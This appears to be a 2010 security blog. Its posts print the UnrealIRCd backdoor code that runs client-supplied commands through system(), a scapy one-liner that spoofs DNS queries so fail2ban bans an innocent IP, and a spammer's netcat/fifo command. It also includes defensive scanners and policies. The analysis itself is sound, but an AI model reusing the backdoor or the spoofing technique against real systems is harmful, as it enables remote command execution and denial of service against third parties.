Posted by Nico Golde in
Sunday, August 8. 2010
I participated together with some friends in this year's edition of the smpCTF quals (actually it took place for the first time). Since we also qualified for the finals we had to submit a writeup of all challenges. For those who are interested, our submission is located at: http://nion.modprobe.de/smpctf/smpctf.html.
All in all I had fun during this weekend, but I also have to say that I've had more fun at other CTFs in the past. What disappointed me especially is that I'm aware of at least 2 challenges that seem to be only slight alterations of challenges from the DEFCON and Codegate quals. I also missed creativity when it comes to the binary exploitation challenges; most of them have not been challenging. But as said, I enjoyed this weekend, had lots of fun, and a big plus was the radio stream during the competition with support from dubstep.fm.
Anyway, congrats to team nibbles who've won the CTF.
Posted by Nico Golde in
Wednesday, July 28. 2010
I was just looking into some specifications of the Open Mobile Alliance when I got the content for today's WTF moment.
An MMS notification is usually sent over SMS and encodes various fields, including the location of the MMS content, so the mobile phone can download it via e.g. WAP.
Now looking at WAP-209-MMSEncapsulation-20020105-a chapter 6.2 (Multimedia Message Notification), there's an interesting header field included in these notifications, X-Mms-Message-Size (mandatory), described as:
Full size of message in octets. The value of this header
field could be based on approximate calculation,
therefore it SHOULD NOT be used as a reason to reject
the MM.
Clearly the people who developed this must have taken some bad drugs. Adding a length field to a header and allowing its value to be based on an approximation rather than an exact value just doesn't explain itself to me.
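To make the consequence of that wording concrete, here is an added example (my own code, not from the post or from the OMA spec): it decodes a constructed m-notification-ind and then shows the download side treating X-Mms-Message-Size as the hint the spec says it is, enforcing a size cap on the bytes actually received instead. The well-known header byte codes are how I read WAP-209 table 7.3 and should be checked against the spec; the transaction id, the MMSC URL and the body chunks are made up.

```python
# Added example: decode a constructed MMS m-notification-ind and treat the declared
# X-Mms-Message-Size as advisory, as WAP-209 section 6.2 says it may be approximate.
# Header codes below are my reading of WAP-209 table 7.3 (encoded byte = code | 0x80);
# verify them against the spec before relying on this decoder.

HDR_MESSAGE_TYPE = 0x0C
HDR_TRANSACTION_ID = 0x18
HDR_MMS_VERSION = 0x0D
HDR_MESSAGE_CLASS = 0x0A
HDR_MESSAGE_SIZE = 0x0E
HDR_EXPIRY = 0x08
HDR_CONTENT_LOCATION = 0x03


def _read_text(buf, i):
    """WSP Text-string: bytes up to a NUL terminator."""
    end = buf.index(b"\x00", i)
    return buf[i:end].decode("ascii"), end + 1


def _read_long_integer(buf, i):
    """WSP Long-integer: Short-length (1..30) followed by that many big-endian octets."""
    n = buf[i]
    if not 1 <= n <= 30:
        raise ValueError("bad Long-integer length %d" % n)
    return int.from_bytes(buf[i + 1:i + 1 + n], "big"), i + 1 + n


def parse_notification(buf):
    """Decode the well-known headers of an m-notification-ind into a dict."""
    headers = {}
    i = 0
    while i < len(buf):
        code = buf[i]
        if not code & 0x80:
            raise ValueError("only well-known (encoded) headers are handled")
        code &= 0x7F
        i += 1
        if code == HDR_MESSAGE_TYPE:
            headers["message_type"] = buf[i]
            i += 1
        elif code == HDR_TRANSACTION_ID:
            headers["transaction_id"], i = _read_text(buf, i)
        elif code == HDR_MMS_VERSION:
            v = buf[i] & 0x7F
            headers["version"] = "%d.%d" % (v >> 4, v & 0x0F)
            i += 1
        elif code == HDR_MESSAGE_CLASS:
            headers["message_class"] = buf[i]
            i += 1
        elif code == HDR_MESSAGE_SIZE:
            headers["message_size"], i = _read_long_integer(buf, i)
        elif code == HDR_EXPIRY:
            # Value-length (short form assumed), token 0x80 absolute / 0x81 relative, Long-integer
            vlen = buf[i]
            token = buf[i + 1]
            secs, _ = _read_long_integer(buf, i + 2)
            headers["expiry"] = ("relative" if token == 0x81 else "absolute", secs)
            i += 1 + vlen
        elif code == HDR_CONTENT_LOCATION:
            headers["content_location"], i = _read_text(buf, i)
        else:
            raise ValueError("unhandled header 0x%02x" % code)
    return headers


# Constructed sample notification: declares 256 octets and points at a placeholder MMSC URL.
SAMPLE_NOTIFICATION = (
    bytes([0x8C, 0x82])                            # X-Mms-Message-Type: m-notification-ind
    + bytes([0x98]) + b"T1\x00"                    # X-Mms-Transaction-ID (made up)
    + bytes([0x8D, 0x90])                          # X-Mms-MMS-Version: 1.0
    + bytes([0x8A, 0x80])                          # X-Mms-Message-Class: Personal
    + bytes([0x8E, 0x02, 0x01, 0x00])              # X-Mms-Message-Size: 256 (approximate!)
    + bytes([0x88, 0x04, 0x81, 0x02, 0x0E, 0x10])  # X-Mms-Expiry: relative, 3600 s
    + bytes([0x83]) + b"http://mmsc.example.invalid/m/1\x00"  # X-Mms-Content-Location (placeholder)
)


def fetch_with_cap(chunks, hard_limit):
    """Receive the MM body (chunks stands in for the WAP/HTTP download), enforcing the
    limit on bytes actually received rather than on the header's declared size.
    Returns the body, or None if the real size exceeds the cap."""
    body = bytearray()
    for chunk in chunks:
        if len(body) + len(chunk) > hard_limit:
            return None
        body += chunk
    return bytes(body)


if __name__ == "__main__":
    print(parse_notification(SAMPLE_NOTIFICATION))
    # Declared 256 octets, server actually sends 300: still accepted, the header is only a hint.
    print(len(fetch_with_cap([b"a" * 200, b"b" * 100], hard_limit=1024)))
```

The point of the split is that the declared size is fine for pre-sizing a buffer or showing the user an estimate, but any reject-or-accept decision has to be made on the real byte count, which is also what a phone needs to do against a hostile MMSC anyway.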
Posted by Nico Golde in
Tuesday, June 29. 2010
I know there is some setting in Adobe Acrobat Reader to switch off monitoring of the X paste buffer (which I couldn't find right now), and it seems one really wants that. I was very surprised today when I tried to paste a password using pwsafe and observed the following:
$ pwsafe -p fandango
Enter passphrase for /home/nion/.pwsafe.dat:
You are ready to paste the password for hosts.fandango from PRIMARY and CLIPBOARD
Press any key when done
Sending password for hosts.fandango to acroread@hostname via CLIPBOARD
So apparently Acrobat Reader is stealing my password from the X paste buffer whenever the application is running. Especially given all the JavaScript and malicious PDF file kung fu that is around these days, I of course don't find this very amusing.
Lesson learned: use xpdf whenever I can, even though it really lacks features :/
Posted by Nico Golde in
Saturday, June 12. 2010
The UnrealIRCd team has just published an advisory stating their release has been backdoored. From the advisory:
We found out that the Unreal3.2.8.1.tar.gz file on our mirrors has been
replaced quite a while ago with a version with a backdoor (trojan) in it.
This backdoor allows a person to execute ANY command with the privileges of
the user running the ircd. The backdoor can be executed regardless of any user
restrictions (so even if you have passworded server or hub that doesn't allow
any users in).
It appears the replacement of the .tar.gz occurred in November 2009 (at least on some mirrors). It seems nobody noticed it until now.
I'm personally not using this software, but this is probably a shock for lots of sysadmins, as this is one of the most popular IRC server applications. The last sentence of this quote is the most shocking to me: this slipped through the cracks for about 8 months without being noticed! This shows yet again that upstream developers need to think about providing ways for users to properly verify the integrity of their releases and (which is probably more important) that users need to verify what they download. It doesn't matter that md5 and friends are broken if nobody checks the hashes anyway.
The UnrealIRCd people seem to have learned their lesson and will start PGP/GPG signing their releases from now on. Hopefully their users verify their tarballs then.
So what was the backdoor exactly about? It didn't take me much time to find a backdoored tarball; "gladly" there are still lots of websites mirroring backdoored tarballs.
The backdoor is pretty small, simple and efficient; a full diff can be found here.
Only two files have been modified; the first one is the important one: src/s_bsd.c, function read_packet():
    static int read_packet(aClient *cptr, fd_set *rfd)
    {
        int dolen = 0, length = 0, done;
        time_t now = TStime();
        if (FD_ISSET(cptr->fd, rfd) &&
            !(IsPerson(cptr) && DBufLength(&cptr->recvQ) > 6090))
        {
            Hook *h;
            SET_ERRNO(0);
    #ifdef USE_SSL
            if (cptr->flags & FLAGS_SSL)
                length = ircd_SSL_read(cptr, readbuf, sizeof(readbuf));
            else
    #endif
                length = recv(cptr->fd, readbuf, sizeof(readbuf), 0);
            cptr->lasttime = now;
            if (cptr->lasttime > cptr->since)
                cptr->since = cptr->lasttime;
            cptr->flags &= ~(FLAGS_PINGSENT | FLAGS_NONL);
            // If not ready, fake it so it isnt closed
            if (length < 0 && ERRNO == P_EWOULDBLOCK)
                return 1;
            if (length <= 0)
                return length;
    #ifdef DEBUGMODE3
            if (!memcmp(readbuf, DEBUGMODE3_INFO, 2))
                DEBUG3_LOG(readbuf);
    #endif
This is the important function that handles and processes all client connection data. The modification is the 4 lines at the end (the #ifdef DEBUGMODE3 block).
The code is simple. The first two bytes of readbuf are compared with DEBUGMODE3_INFO; readbuf is the buffer that was filled a few lines earlier with data read from the client connection. So basically this introduces a new IRC "command", DEBUGMODE3_INFO.
DEBUGMODE3_INFO is defined as AB in include/struct.h. If the received bytes match AB, DEBUG3_LOG is called with the read buffer as argument. DEBUG3_LOG is just another macro that resolves to DEBUG3_DOLOG_SYSTEM (defined in the same file), which looks like:
    #define DEBUG3_DOLOG_SYSTEM(x) system(x)
So this allows an attacker to connect to the IRC server and execute arbitrary commands by using the AB command. This is probably the simplest backdoor one can think of, but it's rather efficient and unlikely to be hit by accident by a client. Bad days for UnrealIRCd, and there are still many servers out there which are probably backdoored this way; at least it didn't cost me much time to find some :/
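For the "verify what you download" point above and for admins wondering whether the tarball they built from is the trojaned one, here is an added example (my own code, not UnrealIRCd's and not from the advisory): it checks a release archive against a published digest and, independently, scans the C sources inside it for the DEBUGMODE3 macros quoted above. The expected SHA-256 is a placeholder to be replaced with the value upstream publishes; the two tarballs are constructed in memory so the example runs offline, and the file contents in them are made-up stand-ins, not UnrealIRCd source.

```python
# Added example: two checks on a downloaded release, a digest comparison and a scan for
# the backdoor markers described in the post. Sample archives are constructed inline.
import hashlib
import hmac
import io
import re
import tarfile

# Marker strings from the backdoor described above (the DEBUGMODE3 macros).
BACKDOOR_PATTERNS = [
    re.compile(rb"DEBUGMODE3_INFO"),
    re.compile(rb"DEBUG3_DOLOG_SYSTEM\s*\(\s*\w+\s*\)\s+system\s*\("),
]

# PLACEHOLDER: sha256 of the genuine tarball as published by upstream; not a real value.
EXPECTED_SHA256 = "0" * 64


def sha256_of(data):
    return hashlib.sha256(data).hexdigest()


def hash_matches(data, expected_hex=EXPECTED_SHA256):
    """Compare the archive digest against the published one (constant-time compare)."""
    return hmac.compare_digest(sha256_of(data), expected_hex.lower())


def scan_archive(data):
    """Return (member name, pattern) pairs for every .c/.h file in the tarball that
    contains one of the backdoor markers. Catches a trojaned tree even if the
    published hash itself were wrong or missing."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar.getmembers():
            if not member.isfile() or not member.name.endswith((".c", ".h")):
                continue
            content = tar.extractfile(member).read()
            for pat in BACKDOOR_PATTERNS:
                if pat.search(content):
                    hits.append((member.name, pat.pattern.decode()))
    return hits


def check_release(data, expected_hex=EXPECTED_SHA256):
    """Combine both checks: 'backdoor-marker-found', 'hash-mismatch' or 'ok'."""
    if scan_archive(data):
        return "backdoor-marker-found"
    if not hash_matches(data, expected_hex):
        return "hash-mismatch"
    return "ok"


def _build_tarball(files):
    """Constructed in-memory tar.gz so the example runs offline."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


# Constructed stand-ins (not real UnrealIRCd source): a clean tree and one carrying the macros.
CLEAN_TARBALL = _build_tarball({
    "Unreal3.2/include/struct.h": b"#define MAXCLIENTS 1024\n",
    "Unreal3.2/src/s_bsd.c": b"static int read_packet(aClient *cptr, fd_set *rfd) { return 0; }\n",
})
BACKDOORED_TARBALL = _build_tarball({
    "Unreal3.2/include/struct.h": (
        b"#define DEBUGMODE3_INFO \"AB\"\n"
        b"#define DEBUG3_DOLOG_SYSTEM(x) system(x)\n"
        b"#define DEBUG3_LOG(x) DEBUG3_DOLOG_SYSTEM(x)\n"
    ),
    "Unreal3.2/src/s_bsd.c": (
        b"#ifdef DEBUGMODE3\n"
        b"if (!memcmp(readbuf, DEBUGMODE3_INFO, 2)) DEBUG3_LOG(readbuf);\n"
        b"#endif\n"
    ),
})


if __name__ == "__main__":
    print("clean tree:", check_release(CLEAN_TARBALL))          # hash-mismatch (placeholder digest)
    print("trojaned tree:", check_release(BACKDOORED_TARBALL))  # backdoor-marker-found
```

The marker scan runs first on purpose: a hash only tells you the bytes differ from what someone published, while a hit on system() behind a DEBUGMODE3 macro tells you what you are actually looking at. Once upstream signs releases, the digest comparison should be replaced by (or preceded by) a signature check against their key.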
Posted by Nico Golde in
Wednesday, June 9. 2010
I occasionally make use of the report function in Opera in case it crashes (which happens quite often on 64bit for me), but if it crashes right when receiving the response of the crash reporting website you really start to HATE that piece of software.
[Screenshot of the crash report dialog; notice the Last visited URL]
FAIL! (using 0.60-6351)
Posted by Nico Golde in
Wednesday, May 26. 2010
fail2ban is used by many people to prevent certain types of DoS attacks. I use it myself to reduce trackback spam a little bit.
While this tool comes in quite handy in such situations, it is also not generally recommended because you can shoot yourself in the foot. If one of the filters in use has a bug and results in incorrect parsing, your fail2ban installation might end up banning arbitrary IP addresses or even your own IP range (not even mentioning IP spoofing).
There have been at least two bugs of this kind to my knowledge, and since regexes are not always easy I'm sure there will be more in the future.
Since I didn't want to look for a specific regex bug in one of the filters, I thought about IP spoofing again and looked at fail2ban's filters. What I needed was a filter processing log entries of a service listening on a UDP socket, as TCP/IP spoofing over the internet doesn't really work well these days. Finding such a filter would mean an instant win situation. To my surprise there is such a filter: config/filter.d/named.conf
This filter is used to parse log entries of denied DNS queries produced by bind. Interestingly there is even an article at debian-administration describing how to set up fail2ban to mitigate a DNS DDoS attack. This is of course a bad idea, and I have no idea why this filter is shipped in a default fail2ban installation. DoSing arbitrary IP addresses with this filter in use becomes as easy as firing up scapy and querying the server with a forged source IP:
>>> send(IP(dst="81.169.172.197",src="xx.46.63.71")/UDP()/DNS(rd=1,qd=DNSQR(qname="foao.modprobe.de")))
.
Sent 1 packets.
This ends up as:
May 26 22:32:22 modprobe named[30245]: client xx.46.63.71#53: query 'foao.modprobe.de/A/IN' denied
in the bind logs which in turn results in:
2010-05-26 22:32:05,551 fail2ban.actions: WARNING [named-refused] Ban xx.46.63.71
In this example the spoofed IP was xx.46.63.71 which is not under my control.
Mission statement: don't use fail2ban unless you really want to shoot yourself in the foot or know pretty well what you're doing.
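To show where the named filter goes wrong and what the decision logic should look like instead, here is an added example (my own code, not fail2ban's; the regex is modelled on the named filter but is not copied from config/filter.d/named.conf): it runs a named-refused style match over constructed bind log lines and then applies a policy that honours an ignoreip list and refuses to turn an unauthenticated UDP source address into a ban. The log lines, the 203.0.113.0/24 and 198.51.100.0/24 addresses and the source_validated flag are all constructed for the example; bind's log line does not tell you the transport, so in practice that flag would have to come from elsewhere.

```python
# Added example: a fail2ban-like matcher for bind's "query denied" lines plus the policy
# the post argues for. Regex, ignore list and log lines are constructed, not fail2ban's.
import ipaddress
import re

# Modelled on fail2ban's named-refused filter: "named[pid]: client A.B.C.D#port: query '...' denied"
NAMED_DENIED = re.compile(
    r"named\[\d+\]: client (?P<ip>\d{1,3}(?:\.\d{1,3}){3})#\d+: query '[^']*' denied"
)

# Constructed ignoreip list, like fail2ban's [DEFAULT] ignoreip: loopback plus the host's own range.
IGNORE_NETS = [ipaddress.ip_network(n) for n in ("127.0.0.0/8", "198.51.100.0/24")]

# Constructed log lines (the line in the post had its first octet masked; 203.0.113.71 is a stand-in).
LOG_LINES = [
    "May 26 22:32:22 modprobe named[30245]: client 203.0.113.71#53: query 'foao.modprobe.de/A/IN' denied",
    "May 26 22:32:23 modprobe named[30245]: client 198.51.100.9#53: query 'foao.modprobe.de/A/IN' denied",
    "May 26 22:32:24 modprobe named[30245]: client 127.0.0.1#53: query 'foao.modprobe.de/A/IN' denied",
    "May 26 22:32:25 modprobe sshd[1234]: Failed password for root from 203.0.113.5 port 4242 ssh2",
]


def extract_ip(line):
    """The part the filter does: pull the client address out of a denied-query line."""
    m = NAMED_DENIED.search(line)
    return m.group("ip") if m else None


def decide(line, source_validated=False, ignore_nets=IGNORE_NETS):
    """Return (action, ip). A firewall ban is only issued when the source address was
    confirmed by a completed handshake (TCP). For a UDP-logged event the address in the
    log is whatever the sender wrote into the packet, so the right response is logging
    and rate limiting inside the service, not a ban on that address."""
    ip = extract_ip(line)
    if ip is None:
        return ("no-match", None)
    addr = ipaddress.ip_address(ip)
    if any(addr in net for net in ignore_nets):
        return ("ignore", ip)
    if not source_validated:
        return ("log-only", ip)
    return ("ban", ip)


def process(lines, source_validated=False):
    """Apply the policy to a batch of log lines."""
    return [decide(line, source_validated) for line in lines]


if __name__ == "__main__":
    for action, ip in process(LOG_LINES):
        print(action, ip)
```

Run as-is, the first line (the spoofable case from the post) comes out as log-only rather than ban; the same line with source_validated=True would be banned, which is the only situation in which the address in a denied-query log means anything. The ignore list is the cheap protection against the regex-bug case: even a broken filter cannot lock you out of your own ranges.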
Posted by Nico Golde in
Friday, March 19. 2010
It is possible with s9y to moderate blog comments after a certain amount of time has passed since the article was published.
A while back I got the following mail to approve a blog comment (I stripped the URL and email address so as not to support the spam):
Mon, 19 Oct 2009 12:18:02 +0200 (CEST)
A new comment has been posted on your blog "nion's blog", to the entry entitled "security of scponly/sftp-server in combination with apache".
Link to entry: http://nion.modprobe.de/blog/archives/679-security-of-scponlysftp-server-in-combination-with-apache.html
Requires review: Yes (Auto-moderation after X days)
User IP-address: 24.123.215.XXX
User Name: SomeSpammer
User Email: webmaster@somespammer.com
User Homepage: http://www.somespammer.com
Comments:
Very interesting, seems so simple when you explain it like that.. nice one
This is quite obviously a spam comment to increase Google ranks or site links in general.
Today I got a new comment:
Fri, 19 Mar 2010 02:35:54 +0200 (CEST)
A new comment has been posted on your blog "nion's blog", to the entry entitled "security of scponly/sftp-server in combination with apache".
Link to entry: http://nion.modprobe.de/blog/archives/679-security-of-scponlysftp-server-in-combination-with-apache.html
Requires review: Yes (Auto-moderation after X days)
User IP-address: 96.30.18.XXX
User Name: SomeSpammer
User Email: webmaster@somespammer.com
User Homepage: http://www.somespammer.com/
Comments:
Weird.. I found myself back here! small world. Reminds of this one from the commmandline kung fu of wietse.
( ( mkfifo ~/nc-feef && ( ( nc -v -l -p 22123 127.0.0.1 > ~/out ) & ) && ( ( cat /tmp/ncf | nc 127.0.0.1 22123 ) & ) && script -f ~/nc-feef ) & )
This comment is pointing to the same spammer site. Now comparing this comment to the first one, at first glance it even seems related to the blog post! Thinking of "wietse", the name Wietse Venema (author of postfix) pops up, so this also sounds familiar.
Though opening a fifo in the home directory, a netcat listening on a TCP port on localhost with the output redirected to a file, then some tmp file piped to the listening port (thus writing the file) and attaching script to the FIFO doesn't really make sense?! Not that this is usually the case with spam, but wtf, this is everything but obviously spam. If you have a blog that gets comments very frequently it might be a problem to sort that out and spot it, even if it's not interesting to you. This is the difference to email: if it's spam you don't notice, but if it's also not interesting you will just delete the mail. With a blog you might approve such a comment as it might be interesting for another reader and you don't have time to read it in detail.
So this spam hit me again 6 months after the first attempt! It's interesting to see how spam evolves over time; this one clearly has been improved.
Now spam bots are producing code. This is scary. It will be interesting to see if and what comment I get from the guy on this article.
Posted by Nico Golde in
Wednesday, March 17. 2010
... or you search for int main(int argn, char **argc) (I was looking for source code snippets that do not use the typical int argc, char **argv names); the Google code search behaves rather strangely.
The first result you get is:
This is not too surprising, as the Google code search features regexes and * is a reserved symbol in POSIX extended regular expressions, but at least the recommendation of int argn, char "main(int" "**argc)" is a bit surprising.
Searching for this actually results in a function that matches the string you wanted to search for originally. So far so good; I didn't look into the codesearch syntax in detail, so this might make sense.
The result looks like:
Note that the result has 9 pages (the screenshot is missing this detail) but also only 9 results. The first question that arises is: why do they only display one result per page instead of n (usually they display more)?
Looking at the other pages it becomes confusing. On page 2 this looks like:
Now where have pages 4-9 gone? OK, to be fair, Google sometimes strips additional search results if the content is too similar; this is not too surprising.
But then, visiting page 3 you get:
Tada, pages are there again!
At this point I am/was totally confused and am really wondering what the idea behind this behaviour is.
If someone is using the Google codesearch more frequently (or even is a Google employee), please enlighten me!
Posted by Nico Golde in
Monday, February 8. 2010
Two weeks ago I got myself a Nokia N900 phone which is running Maemo 5. So far I am quite happy with it, given that my previous phone was a Sony Ericsson P1i which is pretty crappy.
I've taken some notes about my experiences:
- under normal use the battery lasts for ~2 days; if I'm using 3G the whole day I need to recharge it daily though
- the terminal has a bug which results in the enter key not working under some conditions; ctrl-m works as a workaround though
- playing normal dvdrips in mplayer is absolutely no problem without downscaling; 720p doesn't perform though
- I somehow managed to get my screen flipped and wasn't able to flip it back; only a reboot solved that
- it is not clear to me which tools you will find in the list of installable packages and which are only visible with apt-cache search. I also managed to end up with a doubled launch icon in my application list for some application
- the terminal is not usable anymore after an ncurses program crashed; "reset" doesn't help either
- wireless uses less battery than UMTS, way less
- the back button in the browser by default opens a fancy eye-candy browsing history which is slow, so I mostly use backspace to browse back
- there are lots of useful tools in the extras-devel repository, e.g. I can control my mpd via mmpc from the phone, which is great
- importing contacts works flawlessly; merging existing contacts also works as expected
- jabber (including XMPP calls) is integrated in the contact information (you can merge a jabber uid into an existing contact)
- I've no idea yet what the internal video player is, but I wasn't able to play a non-downscaled XviD file with it; mplayer does play it fine
- freely placeable widgets are awesome
- it's really user-friendly and no geeky linux user phone
- I would prefer not having busybox by default; I can install bash but the libc is still from busybox, which implies world-readable password hashes in /etc/passwd, so no other user accounts on my mobile
- is there disk encryption available?
- n900fly can't do any good
- GPS with Nokia Maps is OK and I find it pretty usable, even if a Google Maps client would be nice as well
- the mp3 player sucks unless you have tagged your music properly; you can't just play some folder without having a playlist for it
- mplayer as an alternative from the console is no real alternative either; if you don't redirect its output to /dev/null it gets stuck in a loop when the display blanks
- the app manager takes the dpkg lock even if you just list available programs; no idea why this is needed and no idea how aptitude and synaptic are doing this
- is there a good todo manager which comes with a widget listing todos?
- is it possible to install armel Debian packages without having a Debian chroot?
- SMS are nicely organized per contact in an instant messaging fashion
- the builtin accelerometer works nicely and you can automatically flip the screen when you want to dial a number; sometimes this happens by accident though
- the multitasking support works awesomely and you get a nice overview of open applications in an Exposé fashion; it may be wise not to have 40 applications open though
- the list of processes is already huge (like 160 processes running in the background)
- I haven't checked out the SDK yet but I will do that soon as I need e.g. newsbeuter for RSS
- hardware feels robust, the ARM Cortex-A8 is imho a very good processor; RAM could be more (the phone is heavily swapping)
- you can not yet use the phone as a wireless access point without building your own kernel images; some people seem to be working on this
- you can manipulate all kinds of stuff through the sysfs, including the phone LED and the vibration
- wireless certificates are sometimes shown to be invalid but there is no details button; you can only click "done"
Those are the things I came up with while using the phone. The calling functionality and everything which is purely phone related really works fine, and the sound quality while talking to someone on the phone is also really good. So far I am really happy with the phone and I can only recommend it. I hope I'll have some time to port some applications to Maemo soon.
Posted by Nico Golde in
Wednesday, December 23. 2009
I always hated garden gnomes and was under the impression that only old people collect them. But I have to admit that I just discovered a love for garden gnomes when I saw the Noam Chomsky garden gnome.
http://www.justsaygnome.net/gnomes-noams--oms---products---ordering.html
If you ever feel like sending me a gift, send me one of those.
Too bad there's also a bunch of other important people I would like to see as garden gnomes! If there is a business around that, please leave a comment.